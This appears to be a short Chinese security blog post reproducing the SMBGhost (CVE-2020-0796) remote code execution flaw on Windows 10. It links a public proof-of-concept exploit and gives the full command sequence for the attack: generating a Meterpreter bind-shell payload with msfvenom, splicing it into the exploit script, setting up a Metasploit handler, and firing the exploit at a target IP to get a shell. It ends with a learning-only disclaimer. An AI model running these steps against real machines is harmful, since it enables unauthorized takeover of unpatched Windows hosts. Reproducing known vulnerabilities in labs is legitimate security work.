前言
多的不用说,又是一个内网大杀器。win10用户真香。具体视频,我会在头条号(safe6安全)发布。
工具下载
奇安信的检测工具
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
EXP下载地址
https://github.com/chompie1337/SMBGhost_RCE_PoC
漏洞复现
1、先用以下命令生成payload
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f python
2、使用生成payload,在exploit.py中用生成的buf替换自己的USER_PAYLOAD
3、msf开启监听
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set rhost 192.168.0.210 set lport 4444 exploit
4、反弹shell
python3 exploit.py -ip 192.168.0.210
来源:http://www.safe6.cn/
本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。
本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2020-06-07
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论